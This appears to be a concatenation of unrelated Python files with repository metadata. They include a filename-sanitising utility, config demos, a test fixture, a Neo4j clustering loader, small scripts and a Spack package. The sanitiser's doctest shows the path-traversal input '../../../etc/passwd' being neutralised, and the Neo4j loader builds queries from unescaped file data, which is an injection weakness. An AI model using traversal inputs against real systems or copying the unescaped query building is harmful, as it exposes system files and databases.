_filename_ascii_add_strip_re = re.compile(r'[^A-Za-z0-9_\u4E00-\u9FBF\u3040-\u30FF\u31F0-\u31FF.-]')
_windows_device_files = (
"CON",
"AUX",
"COM1",
"COM2",
"COM3",
"COM4",
"LPT1",
"LPT2",
"LPT3",
"PRN",
"NUL",
)
PY2 = sys.version_info[0] == 2
if PY2:
text_type = unicode
else:
text_type = str
def secure_filename(filename):
r"""Pass it a filename and it will return a secure version of it. This
filename can then safely be stored on a regular file system and passed
to :func:`os.path.join`.
On windows systems the function also makes sure that the file is not
named after one of the special device files.
>>> secure_filename("My cool movie.mov")
'My_cool_movie.mov'
>>> secure_filename("../../../etc/passwd")
'etc_passwd'
>>> secure_filename(u'i contain cool \xfcml\xe4uts.txt')
'i_contain_cool_umlauts.txt'
The function might return an empty filename. It's your responsibility
to ensure that the filename is unique and that you abort or
generate a random filename if the function returned an empty one.
.. versionadded:: 0.5
:param filename: the filename to secure
"""
if isinstance(filename, text_type):
from unicodedata import normalize
filename = normalize("NFKD", filename).encode("utf-8", "ignore")
if not PY2:
filename = filename.decode("utf-8")
for sep in os.path.sep, os.path.altsep:
if sep:
filename = filename.replace(sep, " ")
filename = to_unicode_str(_filename_ascii_add_strip_re.sub('', '_'.join(
filename.split()))).strip('._')
# filename = str(_filename_ascii_strip_re.sub("", "_".join(filename.split()))).strip(
# "._"
# )
# on nt a couple of special files are present in each folder. We
# have to ensure that the target file is not such a filename. In
# this case we prepend an underline
if (
os.name == "nt"
and filename
and filename.split(".")[0].upper() in _windows_device_files
):
filename = "_" + filename
return filename
if __name__ == '__main__':
print(os.getcwd())
| 24.955307 | 100 | 0.596597 | # -*- coding: utf-8 -*-
import os
import re
import sys
from werkzeug import utils
try:
from os import scandir
except:
from scandir import scandir
def to_unicode_str(s):
if sys.version_info < (3, 4) and not isinstance(s, unicode):
if isinstance(s, str):
try:
s = s.decode('utf-8')
except:
s = s.decode('gbk')
else:
s = unicode(s)
elif sys.version_info >= (3, 4) and not isinstance(s, str):
s = str(s)
return s
def url_path_to_local_abspath(path):
# path = path.split('?', 1)[0] # char `#` and `?` in path is a part of file not
# path = path.split('#', 1)[0] # special char of url_encode
if path == '':
path = '.'
return normalize_path(os.path.abspath(path))
def normalize_path(path):
p = os.path.normpath(path)
if os.sep == '\\':
p = p.replace('\\', '/')
p = p.rstrip('/')
return to_unicode_str(p)
def parents_path(path):
"""
:param path:
:return: return parents_path which does not contain the end '/', that is remove the end '/'
"""
res = set()
path = normalize_path(path)
while '/' in path:
sep_ind = path.rindex('/')
res.add(path[:sep_ind])
path = path[:sep_ind]
if path.startswith('./') or not path.startswith('.'):
res.add('.')
return res
def parent_path(path):
"""
:param path:
:return: return path which does not contain the end '/'
"""
path = normalize_path(path)
if '/' not in path:
return '.'
else:
sep_ind = path.rindex('/')
return path[:sep_ind]
def get_filename(path):
path = normalize_path(path)
if '/' in path:
sep_ind = path.rindex('/')
return path[sep_ind + 1:]
else:
return path
def get_suffix(path):
if '.' in path:
return path[path.rindex('.') + 1:]
else:
return ''
def is_child(child_path, parent_path):
nc = normalize_path(child_path)
np = normalize_path(parent_path)
if len(nc) > len(np) and nc.startswith(np + '/'):
return True
return False
def listdir(path):
return scandir(to_unicode_str(path))
_filename_ascii_strip_re = re.compile(r"[^A-Za-z0-9_.-]")
_filename_ascii_add_strip_re = re.compile(r'[^A-Za-z0-9_\u4E00-\u9FBF\u3040-\u30FF\u31F0-\u31FF.-]')
_windows_device_files = (
"CON",
"AUX",
"COM1",
"COM2",
"COM3",
"COM4",
"LPT1",
"LPT2",
"LPT3",
"PRN",
"NUL",
)
PY2 = sys.version_info[0] == 2
if PY2:
text_type = unicode
else:
text_type = str
def secure_filename(filename):
r"""Pass it a filename and it will return a secure version of it. This
filename can then safely be stored on a regular file system and passed
to :func:`os.path.join`.
On windows systems the function also makes sure that the file is not
named after one of the special device files.
>>> secure_filename("My cool movie.mov")
'My_cool_movie.mov'
>>> secure_filename("../../../etc/passwd")
'etc_passwd'
>>> secure_filename(u'i contain cool \xfcml\xe4uts.txt')
'i_contain_cool_umlauts.txt'
The function might return an empty filename. It's your responsibility
to ensure that the filename is unique and that you abort or
generate a random filename if the function returned an empty one.
.. versionadded:: 0.5
:param filename: the filename to secure
"""
if isinstance(filename, text_type):
from unicodedata import normalize
filename = normalize("NFKD", filename).encode("utf-8", "ignore")
if not PY2:
filename = filename.decode("utf-8")
for sep in os.path.sep, os.path.altsep:
if sep:
filename = filename.replace(sep, " ")
filename = to_unicode_str(_filename_ascii_add_strip_re.sub('', '_'.join(
filename.split()))).strip('._')
# filename = str(_filename_ascii_strip_re.sub("", "_".join(filename.split()))).strip(
# "._"
# )
# on nt a couple of special files are present in each folder. We
# have to ensure that the target file is not such a filename. In
# this case we prepend an underline
if (
os.name == "nt"
and filename
and filename.split(".")[0].upper() in _windows_device_files
):
filename = "_" + filename
return filename
if __name__ == '__main__':
print(os.getcwd())
| 1,202 | 0 | 161 |
a2533bb28bfb5cd5a97367c29d9187aba0e778ce | 2,345 | py | Python | demo/framework.py | lechat/multiconf | c41cbe9ab3fb768a7d4dbd7b9f5d983b1306bde3 | [
"BSD-3-Clause"
] | null | null | null | demo/framework.py | lechat/multiconf | c41cbe9ab3fb768a7d4dbd7b9f5d983b1306bde3 | [
"BSD-3-Clause"
] | null | null | null | demo/framework.py | lechat/multiconf | c41cbe9ab3fb768a7d4dbd7b9f5d983b1306bde3 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2012 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
import sys
import os.path
from os.path import join as jp
here = os.path.dirname(__file__)
sys.path.append(jp(here, '../..'))
from multiconf import ConfigRoot, ConfigItem, ConfigBuilder
from multiconf.decorators import nested_repeatables, repeat, required
# Here we define what can be repeated within the configuration item. In this case
# we will have many managed servers and datasources
@nested_repeatables('managed_servers, datasources')
class weblogic_config(ConfigRoot):
''' This is just a simple holder of managed_servers and datasources '''
# Weblogic's standalone administration server. Used to control domain.
# Here specify that a managed_server can be repeated within it's parent (domain)
@repeat()
# Here we specify that a parameter num_servers is required when defining a
# builder for managed_server
@required('num_servers')
class managed_servers(ConfigBuilder):
''' Builder for managed_server objects. Used in environment configuration to
automatically create proper number of managed_server objects '''
@repeat()
| 41.140351 | 126 | 0.742004 | # Copyright (c) 2012 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
import sys
import os.path
from os.path import join as jp
here = os.path.dirname(__file__)
sys.path.append(jp(here, '../..'))
from multiconf import ConfigRoot, ConfigItem, ConfigBuilder
from multiconf.decorators import nested_repeatables, repeat, required
# Here we define what can be repeated within the configuration item. In this case
# we will have many managed servers and datasources
@nested_repeatables('managed_servers, datasources')
class weblogic_config(ConfigRoot):
''' This is just a simple holder of managed_servers and datasources '''
def __init__(self, selected_env, valid_envs, **attr):
super(weblogic_config, self).__init__(selected_env, valid_envs, **attr)
# Weblogic's standalone administration server. Used to control domain.
class admin_server(ConfigItem):
def __init__(self, **attr):
super(admin_server, self).__init__(name='admin', server_type='admin', **attr)
# Here specify that a managed_server can be repeated within it's parent (domain)
@repeat()
class managed_server(ConfigItem):
def __init__(self, name, **attr):
super(managed_server, self).__init__(name=name, server_type='managed', **attr)
# Here we specify that a parameter num_servers is required when defining a
# builder for managed_server
@required('num_servers')
class managed_servers(ConfigBuilder):
''' Builder for managed_server objects. Used in environment configuration to
automatically create proper number of managed_server objects '''
def __init__(self, num_servers, host_pattern, base_port, **attr):
super(managed_servers, self).__init__(num_servers=num_servers, host_pattern=host_pattern, base_port=base_port, **attr)
def build(self):
for server_num in xrange(1, self.num_servers+1):
# Here we are generating the managed_server's name and host name, from a pattern and the managed server number
server_name = 'ms%d' % server_num
host_name = self.host_pattern % dict(n=server_num)
managed_server(name=server_name, host=host_name, port=self.base_port+10+server_num)
@repeat()
class datasource(ConfigItem):
def __init__(self, **attr):
super(datasource, self).__init__(**attr)
| 909 | 30 | 223 |
de2e5d6d77fa2b68900522319a74e9122be0658d | 1,585 | py | Python | tests/fixtures/test_author_contributions/content_01_expected.py | elifesciences/elife-tools | ee345bf0e6703ef0f7e718355e85730abbdfd117 | [
"MIT"
] | 9 | 2015-04-16T08:13:31.000Z | 2020-05-18T14:03:06.000Z | tests/fixtures/test_author_contributions/content_01_expected.py | elifesciences/elife-tools | ee345bf0e6703ef0f7e718355e85730abbdfd117 | [
"MIT"
] | 310 | 2015-02-11T00:30:09.000Z | 2021-07-14T23:58:50.000Z | tests/fixtures/test_author_contributions/content_01_expected.py | elifesciences/elife-tools | ee345bf0e6703ef0f7e718355e85730abbdfd117 | [
"MIT"
] | 9 | 2015-02-04T01:21:28.000Z | 2021-06-15T12:50:47.000Z | expected = [
{
"id": "con1",
"text": "<p>RAA, Conception and design, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con2",
"text": "<p>LWB, Conception and design, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con3",
"text": "<p>CS, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con4",
"text": "<p>RKD, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con5",
"text": "<p>RZ, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con6",
"text": "<p>SRF, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con7",
"text": "<p>JC, Conception and design, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con8",
"text": "<p>NK, Conception and design, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con9",
"text": "<p>NISC Comparative Sequencing Program: JM did X, IM did Y and JB did Z and Y</p>",
"fn-type": "con",
},
]
| 33.020833 | 144 | 0.529968 | expected = [
{
"id": "con1",
"text": "<p>RAA, Conception and design, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con2",
"text": "<p>LWB, Conception and design, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con3",
"text": "<p>CS, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con4",
"text": "<p>RKD, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con5",
"text": "<p>RZ, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con6",
"text": "<p>SRF, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con7",
"text": "<p>JC, Conception and design, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con8",
"text": "<p>NK, Conception and design, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con9",
"text": "<p>NISC Comparative Sequencing Program: JM did X, IM did Y and JB did Z and Y</p>",
"fn-type": "con",
},
]
| 0 | 0 | 0 |
9948e1f94b91f2d4c8102e9952d01a6734aedda2 | 8,348 | py | Python | dev/BuildGraph.py | galadrielbriere/ClustOmics | af3d6aae878483f6401c06ef50a7eb78e1e76917 | [
"MIT"
] | 2 | 2021-05-16T18:16:03.000Z | 2021-06-02T07:28:44.000Z | dev/BuildGraph.py | galadrielbriere/ClustOmics | af3d6aae878483f6401c06ef50a7eb78e1e76917 | [
"MIT"
] | null | null | null | dev/BuildGraph.py | galadrielbriere/ClustOmics | af3d6aae878483f6401c06ef50a7eb78e1e76917 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 25 13:08:45 2019
@author: briere
"""
import logging
import argparse
import os
from neo4j import GraphDatabase
descr = ('This script instanciate a Neo4j graph database from the metadata '
'file and the various clustering results to integrate.')
parser = argparse.ArgumentParser(description=descr)
parser.add_argument("-id", "--neo_id", help="Neo4j ID used to connect to the database")
parser.add_argument("-pwd", "--neo_pwd", help="Neo4j password used to connect to the database")
parser.add_argument("-host", "--neo_localhost", help="Neo4j graph localhost")
parser.add_argument("-cls", "--clustering_folder", help="Path to directory containing clustering "
"results files and metadata file \n Please note that cluster files must be "
"names following the pattern : {SUBJECT}_{DATATYPE}_{METHOD}.clst \n"
"The metadata file must be names following the pattern : "
"{SUBJECT}_metadata.txt \n Please, read the docs to make sure your "
"files respect the mandatory format.")
parser.add_argument("-subj", "--subject", help="Analysis subject")
parser.add_argument("-out", "--log_out", help="Log file")
args = parser.parse_args()
neo_id = args.neo_id
neo_pwd = args.neo_pwd
neo_localhost = args.neo_localhost
results_path = args.clustering_folder
subject = args.subject
log_file = args.log_out
logging.basicConfig(filename=log_file, level=logging.INFO, format='%(message)s')
logging.info('Loading results from %s in %s \n' % (subject, results_path))
def make_graph(results_path, subject, driver):
'''
Parameters
----------
results_path : STRING
Path to folder containing raw clustering results.
subject : STRING
Subject of analysis (e.g: AML to run the analysis form AML cancer).
Returns
-------
Log file. Instanciates the graph database with data from metadata file
and clustering results files.
'''
files = os.listdir(os.path.join(results_path, subject))
metadata_file = [file for file in files if "metadata" in file][0]
logging.info('Initiating graph from %s metadata.', metadata_file)
create_object_nodes(os.path.join(results_path, subject, metadata_file), subject, driver)
clustering_files = [file[0:-5] for file in files if file[-5:len(file)] == ".clst"]
for file in clustering_files:
datatype = file.split('_')[1]
method = file.split('_')[2]
clust_file = str(file) + '.clst'
logging.info('Loading %s clustering results.',
os.path.join(results_path, subject, clust_file))
logging.info('- computed on datatype : %s', datatype)
logging.info('- computed with method : %s', method)
create_cluster_nodes(os.path.join(results_path, subject, clust_file),
subject, datatype, method, driver)
def create_object_nodes(metadata_file, subject, driver):
'''
Parameters
----------
metadata_file : STRING
Path to metadata file. Must be named as follow:
{SUBJECT}_metadata.txt
subject : STRING
Subject of analysis (e.g: AML to run the analysis form AML cancer).
Returns
-------
Instanciate graph with data from metadata file.
metadata_file : rows = "obects" nodes ids
cols = metadata nodes ids (with header as node names)
On first line, for each column, specify how it should be represented in the graph:
- "main_nodes" for the objects to cluster (e.g Patients TCGA id)
- as a node linked to main_nodes: "node"
- as a label of main_nodes: "label"
- as a property of main nodes : "prop"
'''
print("Instanciating graph for " + subject + "from metadata file : " + metadata_file)
print("Check the graph in your Neo4j browser by querying : \n" +
"MATCH (o:" + subject + ") RETURN o LIMIT 100")
graph = driver.session()
with open(metadata_file) as file:
line = file.readline()
line = line.strip()
col_types = line.split('\t')
for col_type in col_types[1:len(col_types)]:
if col_type not in ('label', 'node', 'property'):
logging.error('Error : Wrong column type. Must be "label",'
'"node" or "property". Please, modify the metadata file. \n')
line = file.readline()
line = line.strip()
col_names = line.split('\t')
main_node = col_names[0]
line = file.readline()
while line:
line = line.strip()
data = line.split('\t')
# Create object node
node_id = data[0]
node = "(o:" + subject + ":" + main_node + "{id:'" + node_id + "'})"
graph.run("MERGE" + node)
# Get metadata
for i in range(1, len(data)):
if col_types[i] == "property" and data[i] != '':
graph.run("MATCH" + node + "SET o." + col_names[i] + "='" + data[i] +"'")
elif col_types[i] == "label" and data[i] != '':
graph.run("MATCH" + node + "SET o:" + data[i])
elif col_types[i] == "node" and data[i] != '':
meta_node = "(m:" + col_names[i] + "{id:'" + data[i] + "'})"
graph.run("MERGE" + meta_node)
meta_rel = "[r:" + col_names[i] + "]"
graph.run("MATCH" + node + " MATCH" + meta_node +\
" CREATE (o)-" + meta_rel + "->(m)")
elif col_types[i] not in ["property", "label", "node"]:
logging.info('"%s" is not a valid keyword.' % (col_types[i]))
logging.info('Please use "property", "label" or "node". Skipping.')
next
line = file.readline()
graph.close()
def create_cluster_nodes(clust_file, subject, datatype, method, driver):
'''
Parameters
----------
clust_file : STRING
Path to a raw clustering result file. This file must be named as follow:
{SUBJECT}_{DATATYPE}_{METHOD}.clst
subject : STRING
Subject of analysis (e.g: AML to run the analysis form AML cancer).
datatype : STRING
Datatype used to compute this clustering.
method : STRING
Method used to compute this clustering.
Returns
-------
Compute edges between main_nodes and their respective cluster nodes.
'''
graph = driver.session()
with open(clust_file) as file:
line = file.readline()
line = line.strip()
col_names = line.split('\t')
main_node = col_names[0]
clust_node = col_names[1]
clust_labels = ":".join([clust_node, subject, datatype, method])
id_base = "_".join([subject, datatype, method])
print("Loading input clustering results for " + subject + "from file: " + clust_file)
print("Check the graph in your Neo4j browser by querying : \n" +
"MATCH (o:" + main_node + ":" + subject + ")-[r:PART_OF]-(c:"+\
clust_labels + ") RETURN * LIMIT 100")
line = file.readline()
while line:
node_id = line.split('\t')[0]
clust_nb = str(line.split('\t')[1].strip())
clust_id = id_base + "_" + str(clust_nb)
node = "(o:" + subject + ":" + main_node + "{id:'" + node_id + "'})"
clust = "(c:" + clust_labels + "{id:'" + clust_id + "'})"
graph.run("MERGE" + clust)
graph.run("MATCH" + clust + " MATCH" + node +\
" CREATE (o)-[:PART_OF]->(c)")
line = file.readline()
graph.close()
def main():
'''
Parameters
----------
neo_id : STRING
Neo4j database connection ID.
neo_pwd : STRING
Password to connect to Neo4j database.
neo_localhost : STRING
Database localhost adress (e.g: http://localhost:7474).
Returns
-------
Instanciate graph from metadata file and raw clustering files.
'''
driver = GraphDatabase.driver(uri=neo_localhost, auth=(neo_id, neo_pwd))
make_graph(results_path, subject, driver)
driver.close()
if __name__ == "__main__":
main()
| 37.434978 | 98 | 0.583972 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 25 13:08:45 2019
@author: briere
"""
import logging
import argparse
import os
from neo4j import GraphDatabase
descr = ('This script instanciate a Neo4j graph database from the metadata '
'file and the various clustering results to integrate.')
parser = argparse.ArgumentParser(description=descr)
parser.add_argument("-id", "--neo_id", help="Neo4j ID used to connect to the database")
parser.add_argument("-pwd", "--neo_pwd", help="Neo4j password used to connect to the database")
parser.add_argument("-host", "--neo_localhost", help="Neo4j graph localhost")
parser.add_argument("-cls", "--clustering_folder", help="Path to directory containing clustering "
"results files and metadata file \n Please note that cluster files must be "
"names following the pattern : {SUBJECT}_{DATATYPE}_{METHOD}.clst \n"
"The metadata file must be names following the pattern : "
"{SUBJECT}_metadata.txt \n Please, read the docs to make sure your "
"files respect the mandatory format.")
parser.add_argument("-subj", "--subject", help="Analysis subject")
parser.add_argument("-out", "--log_out", help="Log file")
args = parser.parse_args()
neo_id = args.neo_id
neo_pwd = args.neo_pwd
neo_localhost = args.neo_localhost
results_path = args.clustering_folder
subject = args.subject
log_file = args.log_out
logging.basicConfig(filename=log_file, level=logging.INFO, format='%(message)s')
logging.info('Loading results from %s in %s \n' % (subject, results_path))
def make_graph(results_path, subject, driver):
'''
Parameters
----------
results_path : STRING
Path to folder containing raw clustering results.
subject : STRING
Subject of analysis (e.g: AML to run the analysis form AML cancer).
Returns
-------
Log file. Instanciates the graph database with data from metadata file
and clustering results files.
'''
files = os.listdir(os.path.join(results_path, subject))
metadata_file = [file for file in files if "metadata" in file][0]
logging.info('Initiating graph from %s metadata.', metadata_file)
create_object_nodes(os.path.join(results_path, subject, metadata_file), subject, driver)
clustering_files = [file[0:-5] for file in files if file[-5:len(file)] == ".clst"]
for file in clustering_files:
datatype = file.split('_')[1]
method = file.split('_')[2]
clust_file = str(file) + '.clst'
logging.info('Loading %s clustering results.',
os.path.join(results_path, subject, clust_file))
logging.info('- computed on datatype : %s', datatype)
logging.info('- computed with method : %s', method)
create_cluster_nodes(os.path.join(results_path, subject, clust_file),
subject, datatype, method, driver)
def create_object_nodes(metadata_file, subject, driver):
'''
Parameters
----------
metadata_file : STRING
Path to metadata file. Must be named as follow:
{SUBJECT}_metadata.txt
subject : STRING
Subject of analysis (e.g: AML to run the analysis form AML cancer).
Returns
-------
Instanciate graph with data from metadata file.
metadata_file : rows = "obects" nodes ids
cols = metadata nodes ids (with header as node names)
On first line, for each column, specify how it should be represented in the graph:
- "main_nodes" for the objects to cluster (e.g Patients TCGA id)
- as a node linked to main_nodes: "node"
- as a label of main_nodes: "label"
- as a property of main nodes : "prop"
'''
print("Instanciating graph for " + subject + "from metadata file : " + metadata_file)
print("Check the graph in your Neo4j browser by querying : \n" +
"MATCH (o:" + subject + ") RETURN o LIMIT 100")
graph = driver.session()
with open(metadata_file) as file:
line = file.readline()
line = line.strip()
col_types = line.split('\t')
for col_type in col_types[1:len(col_types)]:
if col_type not in ('label', 'node', 'property'):
logging.error('Error : Wrong column type. Must be "label",'
'"node" or "property". Please, modify the metadata file. \n')
line = file.readline()
line = line.strip()
col_names = line.split('\t')
main_node = col_names[0]
line = file.readline()
while line:
line = line.strip()
data = line.split('\t')
# Create object node
node_id = data[0]
node = "(o:" + subject + ":" + main_node + "{id:'" + node_id + "'})"
graph.run("MERGE" + node)
# Get metadata
for i in range(1, len(data)):
if col_types[i] == "property" and data[i] != '':
graph.run("MATCH" + node + "SET o." + col_names[i] + "='" + data[i] +"'")
elif col_types[i] == "label" and data[i] != '':
graph.run("MATCH" + node + "SET o:" + data[i])
elif col_types[i] == "node" and data[i] != '':
meta_node = "(m:" + col_names[i] + "{id:'" + data[i] + "'})"
graph.run("MERGE" + meta_node)
meta_rel = "[r:" + col_names[i] + "]"
graph.run("MATCH" + node + " MATCH" + meta_node +\
" CREATE (o)-" + meta_rel + "->(m)")
elif col_types[i] not in ["property", "label", "node"]:
logging.info('"%s" is not a valid keyword.' % (col_types[i]))
logging.info('Please use "property", "label" or "node". Skipping.')
next
line = file.readline()
graph.close()
def create_cluster_nodes(clust_file, subject, datatype, method, driver):
'''
Parameters
----------
clust_file : STRING
Path to a raw clustering result file. This file must be named as follow:
{SUBJECT}_{DATATYPE}_{METHOD}.clst
subject : STRING
Subject of analysis (e.g: AML to run the analysis form AML cancer).
datatype : STRING
Datatype used to compute this clustering.
method : STRING
Method used to compute this clustering.
Returns
-------
Compute edges between main_nodes and their respective cluster nodes.
'''
graph = driver.session()
with open(clust_file) as file:
line = file.readline()
line = line.strip()
col_names = line.split('\t')
main_node = col_names[0]
clust_node = col_names[1]
clust_labels = ":".join([clust_node, subject, datatype, method])
id_base = "_".join([subject, datatype, method])
print("Loading input clustering results for " + subject + "from file: " + clust_file)
print("Check the graph in your Neo4j browser by querying : \n" +
"MATCH (o:" + main_node + ":" + subject + ")-[r:PART_OF]-(c:"+\
clust_labels + ") RETURN * LIMIT 100")
line = file.readline()
while line:
node_id = line.split('\t')[0]
clust_nb = str(line.split('\t')[1].strip())
clust_id = id_base + "_" + str(clust_nb)
node = "(o:" + subject + ":" + main_node + "{id:'" + node_id + "'})"
clust = "(c:" + clust_labels + "{id:'" + clust_id + "'})"
graph.run("MERGE" + clust)
graph.run("MATCH" + clust + " MATCH" + node +\
" CREATE (o)-[:PART_OF]->(c)")
line = file.readline()
graph.close()
def main():
'''
Parameters
----------
neo_id : STRING
Neo4j database connection ID.
neo_pwd : STRING
Password to connect to Neo4j database.
neo_localhost : STRING
Database localhost adress (e.g: http://localhost:7474).
Returns
-------
Instanciate graph from metadata file and raw clustering files.
'''
driver = GraphDatabase.driver(uri=neo_localhost, auth=(neo_id, neo_pwd))
make_graph(results_path, subject, driver)
driver.close()
if __name__ == "__main__":
main()
| 0 | 0 | 0 |
27899259a957b4d8938490e555c47e2ab24e0936 | 820 | py | Python | botTools/proximityFinder.py | LHGames-2018/Look-Ma-No-HandsEsclamation | 10454605a7c8bef42e2ced9b10e40b2a3a688747 | [
"MIT"
] | null | null | null | botTools/proximityFinder.py | LHGames-2018/Look-Ma-No-HandsEsclamation | 10454605a7c8bef42e2ced9b10e40b2a3a688747 | [
"MIT"
] | null | null | null | botTools/proximityFinder.py | LHGames-2018/Look-Ma-No-HandsEsclamation | 10454605a7c8bef42e2ced9b10e40b2a3a688747 | [
"MIT"
] | null | null | null | import math
from helper import Point
| 25.625 | 72 | 0.608537 | import math
from helper import Point
class ProximityFinder:
@staticmethod
def findClosestTile(playerPosition, tiles):
"""
Retourne la position de la tuile la plus proche du personnage
:param playerPosition: position du joueur
:param tiles: une liste des tuiles de meme type
:return: la position de la tuile la plus proche dans cette liste
"""
positionTuileProche = {}
distanceMin = 20000
for tuile in tiles:
x = math.pow(tuile.x - playerPosition.x, 2)
y = pow(tuile.y - playerPosition.y, 2)
distance = math.sqrt(x + y)
if distance < distanceMin:
positionTuileProche = Point(tuile.x, tuile.y)
distanceMin = distance
return positionTuileProche
| 0 | 759 | 23 |
634f5d7e03d3f278d68ac61c4a16b596c7887d60 | 534 | py | Python | Requirement 5/code/old versions of code/ii.py | Dhaval-B-Patel/DIGITAL-SECURITY-PROJECT | 0195f121c272c5db20865641620cf6c652894d97 | [
"Unlicense"
] | null | null | null | Requirement 5/code/old versions of code/ii.py | Dhaval-B-Patel/DIGITAL-SECURITY-PROJECT | 0195f121c272c5db20865641620cf6c652894d97 | [
"Unlicense"
] | null | null | null | Requirement 5/code/old versions of code/ii.py | Dhaval-B-Patel/DIGITAL-SECURITY-PROJECT | 0195f121c272c5db20865641620cf6c652894d97 | [
"Unlicense"
] | null | null | null | from skimage import io
import matplotlib.pyplot as plt
import sys
image = io.imread(sys.argv[1])
_ = plt.hist(image.ravel(), bins = 256, color = 'orange', )
_ = plt.hist(image[:, :, 0].ravel(), bins = 256, color = 'red', alpha = 0.5)
_ = plt.hist(image[:, :, 1].ravel(), bins = 256, color = 'Green', alpha = 0.5)
_ = plt.hist(image[:, :, 2].ravel(), bins = 256, color = 'Blue', alpha = 0.5)
_ = plt.xlabel('Intensity Value')
_ = plt.ylabel('Count')
_ = plt.legend(['Total', 'Red_Channel', 'Green_Channel', 'Blue_Channel'])
plt.show() | 41.076923 | 78 | 0.627341 | from skimage import io
import matplotlib.pyplot as plt
import sys
image = io.imread(sys.argv[1])
_ = plt.hist(image.ravel(), bins = 256, color = 'orange', )
_ = plt.hist(image[:, :, 0].ravel(), bins = 256, color = 'red', alpha = 0.5)
_ = plt.hist(image[:, :, 1].ravel(), bins = 256, color = 'Green', alpha = 0.5)
_ = plt.hist(image[:, :, 2].ravel(), bins = 256, color = 'Blue', alpha = 0.5)
_ = plt.xlabel('Intensity Value')
_ = plt.ylabel('Count')
_ = plt.legend(['Total', 'Red_Channel', 'Green_Channel', 'Blue_Channel'])
plt.show() | 0 | 0 | 0 |
16c1ba6463e66a8c7b907f0b22be21daf693caf1 | 851 | py | Python | var/spack/repos/builtin/packages/r-jpeg/package.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 11 | 2015-10-04T02:17:46.000Z | 2018-02-07T18:23:00.000Z | var/spack/repos/builtin/packages/r-jpeg/package.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 22 | 2017-08-01T22:45:10.000Z | 2022-03-10T07:46:31.000Z | var/spack/repos/builtin/packages/r-jpeg/package.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4 | 2016-06-10T17:57:39.000Z | 2018-09-11T04:59:38.000Z | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RJpeg(RPackage):
"""Read and write JPEG images.
This package provides an easy and simple way to read, write and display
bitmap images stored in the JPEG format. It can read and write both files
and in-memory raw vectors."""
cran = "jpeg"
version('0.1-9', sha256='01a175442ec209b838a56a66a3908193aca6f040d537da7838d9368e46913072')
version('0.1-8.1', sha256='1db0a4976fd9b2ae27a37d3e856cca35bc2909323c7a40724846a5d3c18915a9')
version('0.1-8', sha256='d032befeb3a414cefdbf70ba29a6c01541c54387cc0a1a98a4022d86cbe60a16')
depends_on('r@2.9.0:', type=('build', 'run'))
depends_on('jpeg')
| 35.458333 | 97 | 0.747356 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RJpeg(RPackage):
"""Read and write JPEG images.
This package provides an easy and simple way to read, write and display
bitmap images stored in the JPEG format. It can read and write both files
and in-memory raw vectors."""
cran = "jpeg"
version('0.1-9', sha256='01a175442ec209b838a56a66a3908193aca6f040d537da7838d9368e46913072')
version('0.1-8.1', sha256='1db0a4976fd9b2ae27a37d3e856cca35bc2909323c7a40724846a5d3c18915a9')
version('0.1-8', sha256='d032befeb3a414cefdbf70ba29a6c01541c54387cc0a1a98a4022d86cbe60a16')
depends_on('r@2.9.0:', type=('build', 'run'))
depends_on('jpeg')
| 0 | 0 | 0 |
1d74c94de683832fa6b065ee16fc011fa1418d9a | 4,072 | py | Python | data_utils.py | KnightZhang625/EANN_TensorFlow | 140bab46148924374fdc0b434dd58ee12f678642 | [
"Apache-2.0"
] | 1 | 2021-11-03T10:59:15.000Z | 2021-11-03T10:59:15.000Z | data_utils.py | KnightZhang625/EANN_TensorFlow | 140bab46148924374fdc0b434dd58ee12f678642 | [
"Apache-2.0"
] | null | null | null | data_utils.py | KnightZhang625/EANN_TensorFlow | 140bab46148924374fdc0b434dd58ee12f678642 | [
"Apache-2.0"
] | null | null | null | # coding:utf-8
# Produced by Jiaxin Zhang
# Start Data: 20_May_2020
# Data processing module.
#
# For GOD I Trust.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
